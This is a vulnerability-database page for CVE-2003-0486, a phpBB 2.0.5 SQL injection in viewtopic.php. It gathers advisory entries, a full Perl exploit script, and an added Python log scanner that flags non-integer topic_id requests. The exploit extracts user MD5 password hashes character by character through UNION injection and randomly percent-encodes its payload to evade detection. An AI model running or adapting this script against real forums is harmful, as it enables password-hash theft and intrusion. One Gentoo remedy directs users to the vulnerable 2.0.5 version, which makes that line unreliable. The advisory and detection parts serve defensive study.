CVE-2003-0486
CVSS 5.0
Published: 2003-08-07 00:00:00
Revised: 2016-10-17 22:34:29

[Original] SQL injection vulnerability in viewtopic.php for phpBB 2.0.5 and earlier allows remote attackers to steal password hashes via the topic_id parameter.


[CNNVD] phpBB viewtopic.php topic_id Remote SQL Injection Vulnerability (CNNVD-200308-018)

phpBB is a popular web-based forum application.
The viewtopic.php script shipped with phpBB does not properly handle user-submitted requests; a remote attacker can exploit this through SQL injection to steal sensitive user data or corrupt the database.
When viewtopic.php is called, phpBB takes "topic_id" directly from the GET request and passes it into an SQL query, so an attacker can submit a crafted SQL string to obtain MD5 password hashes; this password information can then be used for automatic login or for brute-force cracking.

- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Access complexity: [--]
Access vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

Product and version information (CPE) not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0486
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0486
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-018
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=105607263130644&w=2
(UNKNOWN)  BUGTRAQ  20030619 phpBB password disclosure by sql injection
http://www.phpbb.com/phpBB/viewtopic.php?t=112052
(VENDOR_ADVISORY)  CONFIRM  http://www.phpbb.com/phpBB/viewtopic.php?t=112052
http://www.securityfocus.com/bid/7979
(VENDOR_ADVISORY)  BID  7979
http://xforce.iss.net/xforce/xfdb/12366
(VENDOR_ADVISORY)  XF  phpbb-viewtopic-sql-injection(12366)

- Vulnerability Information

phpBB viewtopic.php topic_id Remote SQL Injection Vulnerability
Medium  Input Validation
2003-08-07 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and Patches

Temporary workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* The lead developer of phpBB has provided a temporary fix at the following address:

http://www.phpbb.com/phpBB/viewtopic.php?t=112052

Vendor patch:
phpBB Group
-----------
The vendor has not yet provided a patch or upgrade; users of this software are advised to watch the vendor's homepage for the latest version:

http://www.phpbb.com/

- Vulnerability Information (44)

phpBB 2.0.5 SQL Injection password disclosure Exploit (EDBID:44)
php webapps
2003-06-20 Verified
0 Rick Patel
N/A
#!/usr/bin/perl -w
#
#
# phpBB password disclosure vuln.
# - rick patel
# 
# There is a sql injection vuln which exists in /viewtopic.php file. The variable is $topic_id
# which gets passed directly to sql server in query. Attacker could pass a special sql string which
# can used to see md5 password hash for any user (!) for phpBB. This pass can be later used with
# autologin or cracked using john. 
#
# Details: 
#
# this is checking done for $topic_id in viewtopic.php:
#
# if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
# {
#     $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
# }
# else if ( isset($HTTP_GET_VARS['topic']) )
# {
#     $topic_id = intval($HTTP_GET_VARS['topic']);
# }
#
# ok... no else statement at end :)
# now if GET[view]=newest and GET[sid] is set, this query gets executed:
#
# $sql = "SELECT p.post_id
#         FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
#         WHERE s.session_id = '$session_id'
#         AND u.user_id = s.session_user_id
#         AND p.topic_id = $topic_id
#         AND p.post_time >= u.user_lastvisit
#         ORDER BY p.post_time ASC
#         LIMIT 1";
#
# $topic_id gets passed directly to query. So how can we use this to do something important? Well
# I decided to use union and create a second query will get us something useful. There were couple of 
# problems i ran into. first, phpBB only cares about the first row returned. second, the select for first
# query is p.post_id which is int, so int becomes the type returned for any other query in union. third,
# there is rest of junk at end " AND p.post_time >= ..." We tell mysql to ignore that by placing /* at end
# of our injected query. So what query can we make that returns only int? 
# this one => select ord(substring(user_password,$index,1)) from phpbb_users where user_id = $uid
# Then all we have to do is query 32 times which $index from 1-32 and we get ord value of all chars of
# md5 hash password. 
#
# I have only tested this with mysql 4 and pgsql . Mysql 3.x does not support unions so you would have to tweak
# the query to do anything useful. 
# 
# This script is for educational purpose only. Please dont use it to do anything else. 
#
# To Fix this bug : http://www.phpbb.com/phpBB/viewtopic.php?t=112052

use IO::Socket;

$remote = shift || 'localhost';
$view_topic = shift || '/phpBB2/viewtopic.php';
$uid = shift || 2;
$port = 80;

$dbtype = 'mysql4'; # mysql4 or pgsql 


print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n";

$p = "";

for($index=1; $index<=32; $index++)
{
    $socket = IO::Socket::INET->new(PeerAddr => $remote,
                                    PeerPort => $port,
                                    Proto => "tcp",
                                    Type => SOCK_STREAM)
        or die "Couldnt connect to $remote:$port : $@\n";
    $str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) .
           "&view=newest" . " HTTP/1.0\n\n";

    print $socket $str;
    print $socket "Cookie: phpBB2mysql_sid=1\n"; # replace this for pgsql or remove it
    print $socket "Host: $remote\n\n";

    while ($answer = <$socket>)
    {
        if ($answer =~ /Location:.*\x23(\d+)/) # Matches the Location: viewtopic.php?p=<num>#<num>
        {
            $p .= chr ($1);
        }
    }

    close($socket);
}

print "\nMD5 Hash for uid $uid is $p\n";

# random encode str. helps avoid detection
sub random_encode
{
    $str = shift;
    $ret = "";
    for($i=0; $i<length($str); $i++)
    {
        $c = substr($str,$i,1);
        $j = rand length($str) * 1000;

        if (int($j) % 2 || $c eq ' ')
        {
            $ret .= "%" . sprintf("%x",ord($c));
        }
        else
        {
            $ret .= $c;
        }
    }
    return $ret;
}

sub make_dbsql
{
    if ($dbtype eq 'mysql4')
    {
        return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*" ;
    } elsif ($dbtype eq 'pgsql')
    {
        return "; 
select ascii(substring(user_password from $index for 1)) as 
post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";
    }
    else 
    {
        return "";
    }
}



# milw0rm.com [2003-06-20]

- Vulnerability Information

2186
phpBB viewtopic.php topic_id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability Description

phpBB contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the "topic_id" variable in the "viewtopic.php" module is not verified properly and will allow an attacker to inject or manipulate SQL queries.

- Timeline

2003-06-19 2003-06-19
2003-06-19 Unknown

- Solution

Upgrade to phpBB version 2.0.6, as it has been reported to have fixed the issue. If unable to upgrade, it is advised to enable magic_quotes_gpc in PHP or to visit the vendor website for the code changes required to fix this issue.
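As an added defensive example (not part of the CNNVD, OSVDB or Exploit-DB records on this page), the following Python script applies the check the description above calls for, a strict integer test on the topic identifier, to constructed access-log lines that reuse the union/ord(substring(...)) string from the exploit header; the parameter names topic_id, t and topic follow the viewtopic.php excerpt quoted there, and the log lines are constructed.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access-log lines (common log format), not real traffic.
# Line 2 carries the union/ord(substring(...)) string from the exploit above,
# with characters randomly percent-encoded the way its random_encode() does.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Jun/2003:10:00:01 +0000] "GET /phpBB2/viewtopic.php?t=1234&start=0 HTTP/1.0" 200 5120
10.0.0.9 - - [19/Jun/2003:10:00:02 +0000] "GET /phpBB2/viewtopic.php?sid=1&topic_id=-1%20un%69on%20%73elect%20ord(substring(user_password,1,1))%20from%20phpbb_users%20where%20user_id=2/*&view=newest HTTP/1.0" 302 0
10.0.0.7 - - [19/Jun/2003:10:00:03 +0000] "GET /phpBB2/viewtopic.php?topic_id=77&view=newest HTTP/1.0" 200 4096
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*"GET (?P<path>[^?" ]+)\??(?P<qs>[^" ]*) HTTP/')
STRICT_INT = re.compile(r'^-?\d+$')

# Parameter names taken from the viewtopic.php excerpt in the exploit header;
# POST_TOPIC_URL is assumed to be 't' (its value in phpBB 2's constants).
TOPIC_PARAMS = ("topic_id", "t", "topic")


def topic_id_of(qs):
    """Return (param, decoded value) for the first topic parameter present, or None.
    parse_qs undoes the percent-encoding, so the random mix of raw and %xx
    characters collapses back to the plain SQL string."""
    params = parse_qs(qs, keep_blank_values=True)
    for name in TOPIC_PARAMS:
        if name in params:
            return name, params[name][0]
    return None


def is_strict_int(value):
    """The check the advisory calls for: the id must be a pure decimal integer,
    which is what an intval() cast on every code path would have enforced."""
    return STRICT_INT.match(value) is not None


def scan_access_log(text):
    """Flag viewtopic.php requests whose topic identifier is not a strict integer."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m or not m.group("path").endswith("viewtopic.php"):
            continue
        found = topic_id_of(m.group("qs"))
        if found and not is_strict_int(found[1]):
            hits.append((m.group("ip"), found[0], found[1]))
    return hits


if __name__ == "__main__":
    for ip, name, value in scan_access_log(SAMPLE_LOG):
        print(f"{ip}: non-integer {name}={value!r}")
```

The injected string contains no quote characters, so magic_quotes_gpc leaves it unchanged; rejecting every non-integer topic identifier is the check that closes the hole, and the same test over decoded query strings catches the percent-encoding mix the exploit uses to evade naive pattern matching.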

- References

- Vulnerability Author

- Vulnerability Information

phpBB Viewtopic.PHP SQL Injection Vulnerability
Input Validation Error 7979
Yes No
2003-06-19 12:00:00 2009-07-11 10:06:00
Discovery of this vulnerability has been credited to Rick <rikul@bellsouth.net>.

- Affected Program Versions

phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4

- Vulnerability Discussion

An SQL injection vulnerability has been reported for phpBB systems that may result in the disclosure of user password hashes; other attacks may also be possible.

phpBB, in some cases, does not sufficiently sanitize user-supplied input which is used when constructing SQL queries to execute on the underlying database. As a result, it is possible to manipulate SQL queries. This may allow a remote attacker to modify query logic or potentially corrupt the database.

- Exploit

The following proof of concept has been provided:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

Gentoo Linux has released an advisory. Users who have installed net-www/phpbb are advised to upgrade to phpbb-2.0.5 by issuing the following commands:

emerge sync
emerge phpbb
emerge clean

- References
